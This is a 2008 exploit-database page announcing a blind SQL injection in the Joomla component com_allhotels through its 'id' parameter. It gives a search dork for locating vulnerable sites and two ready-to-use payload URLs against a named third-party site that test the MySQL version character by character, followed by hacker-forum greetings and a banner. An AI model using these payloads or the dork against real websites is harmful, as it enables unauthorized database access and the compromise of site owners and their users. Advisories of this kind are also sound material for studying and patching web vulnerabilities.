[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
# Published : 2008-12-23
# Author : Hussin X
# Previous Title : Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln
# Next Title : RSS Simple News (news.php pid) Remote SQL Injection Exploit
Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
___________________________________
script : http://www.joomlahbs.com/ & http://www.leveltensolutions.net/spa/
DorK : inurl:index.php?option=com_allhotels
Demo :
_______
http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________
_____ ____ __ __ _ ____ ____ ____
|_ _| | _ / / / / ___| / ___| / ___|
| | | |_) | V / / _ | | _ | | | |
| | | _ < | | / ___ | |_| | _ | |___ | |___
|_| |_| _ |_| /_/ _ ____| (_) ____| ____|
# www.Syue.com [2008-12-23]